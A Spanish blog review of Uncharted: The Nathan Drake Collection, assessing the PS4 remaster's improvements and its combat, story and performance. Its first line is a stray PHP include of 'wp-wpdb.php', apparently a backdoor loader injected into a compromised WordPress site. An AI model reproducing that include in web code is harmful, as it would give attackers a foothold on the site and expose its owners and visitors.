if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Uncharted The Nathan Drake Collection – La Fortaleza de LeChuck

Análisis Uncharted The Nathan Drake Collection

Esta generación será conocida como la de los «remastered» y tanto PS4, como Xbox One y también Wii U se han apuntado a la moda de lanzar remasterizaciones, incluso de juegos que apenas tienen 3 años. A falta de grandes lanzamientos exclusivos en PS4, y aún lejana la fecha de Uncharted 4, Sony ha lanzado Uncharted The Nathan Drake Collection para PlayStation 4, una colección de las aventuras de Drake que contiene horas de acción y búsqueda de tesoros.

uncharted-nathan-drake-collection

A diferencia de algunos lavados de imagen más sencillos que hemos ido viendo en otras remasterizaciones, Bluepoint Games ha trabajado duro para ofrecernos un nivel notable de calidad en este recopilatorio. En lugar de dar simplemente un lavado de cara, han retocado y mejorado los títulos para proporcionar una experiencia unificada y de nueva generación. El original, Uncharted: El Tesoro de Drake, ahora dispone de las mejoras de combate visto en sus secuelas, así que hay muy poca diferencia de mecánicas en la trilogía.

Es difícil mejorar un juego de hace unos años sin rehacerlo por completo, y no se puede negar que Uncharted: El Tesoro de Drake ha envejecido especialmente mal, con un repetitivo combate a distancia e incómoda lucha cuerpo a cuerpo, por no hablar de las animaciones simples de la época. Las mejoras del remaster ayudan, y la historia sigue siendo divertida y emocionante gracias en gran parte por el guión y algunas interpretaciones de los actores de voz.

uncharted_the_nathan_drake_collection-2

En cambio, Uncharted 2: El Reino de los Ladrones, es un juego más equilibrado y superior en lineas generales. Su historia es más interesante que la del original y logra acercarnos a las aventuras de Indy. Tiene escenas francamente espectaculares y desprende acción por los cuatro costados, sin embargo, perduran los problemas en el combate cercano, y aunque lo han mejorado, todavía es lento y poco satisfactorio.

Y finalmente llegamos a Uncharted 3: La traición de Drake, un salto con respecto a sus predecesores. Las luchas cuerpo a cuerpo son más frecuentes y han mejorado significativamente. Los entornos están mejor diseñados, lo que permite a Nathan trepar, saltar y girar con mayor facilidad. El combate a distancia es muy variado, con diferentes lugares que cambian la forma en que se siente el enfrentamiento, y han añadido nuevos enemigos para mantener la historia original y fresca. Sin embargo, todavía hay cosas que Naughty Dog podría haber mejorado, como las coberturas. Un problema recurrente en los tres juegos es el sistema de cobertura, el personaje se pega a la pared de tal forma que se hace difícil de controlar en una batalla. Del mismo modo, hay varios saltos mortales que requieren de ensayo y error y carecen de sentido alguno.

uncharted_the_nathan_drake_collection-3

Gráficamente, los juegos van a 60fps constantes y 1080p, y no aprecié caídas en el rendimiento. La banda sonora también ha recibido un retoque para hacernos disfrutar más que nunca de la estupenda OST que hace aún más espectacular el conjunto.

A pesar de los pequeños detalles negativos comentados en Uncharted The Nathan Drake Collection, la diferencia entre el primer y el tercer juego es abismal y se puede apreciar el esfuerzo y evolución de la compañía por traernos nuevas y más frenéticas aventuras. Es de agradecer que Naughty Dog esté continuamente tratando de mejorar y reinventarse y queda demostrado que Drake aún tiene mucho que decir, y el año que viene disfrutaremos de más acción con Uncharted 4. Sin embargo, Naughty Dog es mucho más que Uncharted, y hace unos años nos sorprendió con The Last of Us, el cual también tuvo su edición remaster.

uncharted_the_nathan_drake_collection-4

Uncharted The Nathan Drake Collection es ideal para fans de la saga y para aquellos que no pudieron disfrutarlos en su día, además de un aperitivo perfecto para abrir boca ante el esperado Uncharted 4.